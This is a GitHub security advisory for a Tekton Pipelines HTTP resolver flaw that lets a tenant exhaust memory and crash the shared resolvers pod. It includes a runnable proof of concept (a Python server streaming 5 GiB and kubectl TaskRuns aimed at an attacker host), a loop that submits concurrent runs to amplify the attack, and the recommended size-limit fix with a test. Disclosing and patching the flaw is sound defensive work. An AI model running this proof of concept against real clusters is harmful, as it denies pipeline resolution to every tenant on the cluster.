
Tekton Pipelines: HTTP Resolver Unbounded Response Body Read Enables Denial of Service via Memory Exhaustion

Moderate severity GitHub Reviewed Published Apr 21, 2026 in tektoncd/pipeline • Updated Apr 24, 2026

Package

gomod github.com/tektoncd/pipeline (Go)

Affected versions

<= 1.11.0

Patched versions

1.11.1

Description

Summary

The HTTP resolver's FetchHttpResource function calls io.ReadAll(resp.Body) with no response body size limit. Any tenant with permission to create TaskRuns or PipelineRuns that reference the HTTP resolver can point it at an attacker-controlled HTTP server that returns a very large response body within the 1-minute timeout window, causing the tekton-pipelines-resolvers pod to be OOM-killed by Kubernetes. Because all resolver types (Git, Hub, Bundle, Cluster, HTTP) run in the same pod, crashing this pod denies resolution service to the entire cluster. Repeated exploitation causes a sustained crash loop. The same vulnerable code path is reached by both the deprecated pkg/resolution/resolver/http and the current pkg/remoteresolution/resolver/http implementations.

Details

pkg/resolution/resolver/http/resolver.go:279–307:

func FetchHttpResource(ctx context.Context, params map[string]string,
    kubeclient kubernetes.Interface, logger *zap.SugaredLogger) (framework.ResolvedResource, error) {

    httpClient, err := makeHttpClient(ctx)  // default timeout: 1 minute
    // ...
    resp, err := httpClient.Do(req)
    // ...
    defer func() { _ = resp.Body.Close() }()

    body, err := io.ReadAll(resp.Body)  // ← no size limit
    if err != nil {
        return nil, fmt.Errorf("error reading response body: %w", err)
    }
    // ...
}
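
The problem is not specific to Tekton's wrapper code: io.ReadAll buffers the entire body in memory, so allocation tracks whatever the server chooses to send. A minimal standalone demonstration of the allocation behavior (illustrative sizes, not Tekton code):

package main

import (
    "fmt"
    "io"
    "net/http"
    "net/http/httptest"
)

func main() {
    // Test server that returns a 64 MiB body at full speed.
    srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
        _, _ = w.Write(make([]byte, 64<<20))
    }))
    defer srv.Close()

    resp, err := http.Get(srv.URL)
    if err != nil {
        panic(err)
    }
    defer resp.Body.Close()

    // io.ReadAll imposes no cap: memory use is proportional to body size.
    body, err := io.ReadAll(resp.Body)
    if err != nil {
        panic(err)
    }
    fmt.Printf("allocated %d MiB for a single response\n", len(body)>>20)
}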

makeHttpClient sets http.Client{Timeout: timeout} where timeout defaults to 1 minute and is configurable via fetch-timeout in the http-resolver-config ConfigMap. The timeout bounds the duration of the entire request (including body read), which limits slow-drip attacks. However, it does not limit the total number of bytes allocated. A fast HTTP server can deliver multi-gigabyte responses well within the 1-minute window.
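
For reference, a ConfigMap sketch that sets this timeout (the ConfigMap name and key come from this advisory; the namespace is an assumption about a default installation):

apiVersion: v1
kind: ConfigMap
metadata:
  name: http-resolver-config
  namespace: tekton-pipelines-resolvers  # assumed install namespace
data:
  fetch-timeout: "1m"  # default; raising this only widens the attack window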

The resolver deployment (config/core/deployments/resolvers-deployment.yaml) sets a 4 GiB memory limit on the controller container. A response of 4 GiB or larger delivered at wire speed will cause io.ReadAll to allocate 4 GiB, triggering an OOM-kill. With the default timeout of 60 seconds, a server delivering at 100 MB/s can supply 6 GB — well above the 4 GiB limit — before the timeout fires.

The remoteresolution HTTP resolver (pkg/remoteresolution/resolver/http/resolver.go:90) delegates directly to the same FetchHttpResource function and is equally affected.

PoC

# Step 1: Run an HTTP server that streams a large response fast
python3 - <<'EOF'
import http.server, socketserver

class LargeResponseHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.end_headers()
        # Stream 5 GiB at full speed; completes in <60s on a local network
        chunk = b"X" * (1024 * 1024)  # 1 MiB chunk
        for _ in range(5120):          # 5120 * 1 MiB = 5 GiB
            self.wfile.write(chunk)

    def log_message(self, *args):
        pass

with socketserver.TCPServer(("", 8080), LargeResponseHandler) as httpd:
    httpd.serve_forever()
EOF

# Step 2: Create a TaskRun that triggers the HTTP resolver
kubectl create -f - <<'EOF'
apiVersion: tekton.dev/v1
kind: TaskRun
metadata:
  name: dos-poc
  namespace: default
spec:
  taskRef:
    resolver: http
    params:
      - name: url
        value: http://attacker-server.internal:8080/large-payload
EOF

# Expected result: tekton-pipelines-resolvers pod is OOM-killed.
# All resolver types in the cluster (git, hub, bundle, cluster, http)
# become unavailable until Kubernetes restarts the pod.
# Repeated submission causes a crash loop that continuously disrupts
# resolution for all tenants in the cluster.
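# To confirm the OOM-kill, inspect the container status (the namespace and
# label selector below are assumptions about a default install):
kubectl -n tekton-pipelines-resolvers get pods
kubectl -n tekton-pipelines-resolvers describe pod \
  -l app.kubernetes.io/component=resolvers | grep -A3 'Last State'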

Note: On clusters where operators have set a higher fetch-timeout (e.g., 10m), the attacker has more time to deliver a larger body, and the attack is more reliable. On clusters with tight memory limits on the resolver pod, a smaller payload suffices.

Impact

  • Denial of Service: OOM-kill of the tekton-pipelines-resolvers pod denies all resolution services cluster-wide until Kubernetes restarts the pod.
  • Crash loop amplification: A tenant can submit multiple concurrent TaskRuns pointing to the attack server (see the sketch after this list). Each in-flight resolution request accumulates memory independently in the same pod, reducing the payload size needed to reach the OOM threshold.
  • Blast radius: Because all resolver types share a single pod, disrupting the HTTP resolver also disrupts unrelated users of the Git, Bundle, Cluster, and Hub resolvers. This is a cluster-wide availability impact achievable by a single namespace-level user.
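
A minimal amplification sketch, assuming the PoC server above (the TaskRun names are hypothetical):

# Each concurrent resolution buffers its own response body in the same pod,
# so five in-flight requests need only ~1/5 of the payload size each.
for i in 1 2 3 4 5; do
kubectl create -f - <<EOF
apiVersion: tekton.dev/v1
kind: TaskRun
metadata:
  name: dos-poc-$i
  namespace: default
spec:
  taskRef:
    resolver: http
    params:
      - name: url
        value: http://attacker-server.internal:8080/large-payload
EOF
done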

Recommended Fix

Wrap resp.Body with io.LimitReader before passing to io.ReadAll. Add a configurable max-body-size option to the http-resolver-config ConfigMap with a sensible default (e.g., 50 MiB, which exceeds the size of any realistic pipeline YAML file):

const defaultMaxBodyBytes = 50 * 1024 * 1024 // 50 MiB

// In FetchHttpResource, replace:
//   body, err := io.ReadAll(resp.Body)
// with the following. Here conf is the resolver's configuration map
// (backed by the http-resolver-config ConfigMap); strconv must be imported.
maxBytes := int64(defaultMaxBodyBytes)
if v, ok := conf["max-body-size"]; ok {
    if parsed, err := strconv.ParseInt(v, 10, 64); err == nil && parsed > 0 {
        maxBytes = parsed
    }
}
// Read one byte past the cap so the length check below can distinguish
// a body of exactly maxBytes from one that exceeds it.
limitedReader := io.LimitReader(resp.Body, maxBytes+1)
body, err := io.ReadAll(limitedReader)
if err != nil {
    return nil, fmt.Errorf("error reading response body: %w", err)
}
if int64(len(body)) > maxBytes {
    return nil, fmt.Errorf("response body exceeds maximum allowed size of %d bytes", maxBytes)
}
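
As a design note, http.MaxBytesReader would also work here: it returns a distinct error once the cap is crossed and, in recent Go versions, accepts a nil ResponseWriter so it can be used on the client side. Either approach bounds the allocation to a fixed ceiling.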

This fix must be applied to FetchHttpResource in pkg/resolution/resolver/http/resolver.go, which is shared by both the deprecated and current HTTP resolver implementations.
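
A regression test along these lines could lock in the behavior (a hedged sketch, not existing Tekton test code; the "url" param key and error message match the fix above, and the fake clientset and no-op logger stand in for real wiring):

package http

import (
    "context"
    nethttp "net/http"
    "net/http/httptest"
    "strings"
    "testing"

    "go.uber.org/zap"
    "k8s.io/client-go/kubernetes/fake"
)

// Hypothetical regression test sketch: serve a body just over the cap
// and assert that FetchHttpResource rejects it instead of buffering it.
func TestFetchHttpResourceRejectsOversizedBody(t *testing.T) {
    // One byte over the assumed 50 MiB default cap.
    srv := httptest.NewServer(nethttp.HandlerFunc(func(w nethttp.ResponseWriter, r *nethttp.Request) {
        _, _ = w.Write(make([]byte, 50*1024*1024+1))
    }))
    defer srv.Close()

    _, err := FetchHttpResource(context.Background(),
        map[string]string{"url": srv.URL},
        fake.NewSimpleClientset(), zap.NewNop().Sugar())
    if err == nil || !strings.Contains(err.Error(), "exceeds maximum allowed size") {
        t.Fatalf("expected oversized-body rejection, got: %v", err)
    }
}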

References

@vdemeester published to tektoncd/pipeline Apr 21, 2026
Published to the GitHub Advisory Database Apr 21, 2026
Reviewed Apr 21, 2026
Published by the National Vulnerability Database Apr 21, 2026
Last updated Apr 24, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
6.5 / 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(13th percentile)

Weaknesses

Uncontrolled Resource Consumption (CWE-400)

The product does not properly control the allocation and maintenance of a limited resource. Learn more on MITRE.

CVE ID

CVE-2026-40924

GHSA ID

GHSA-m2cx-gpqf-qf74

Source code

github.com/tektoncd/pipeline

Credits
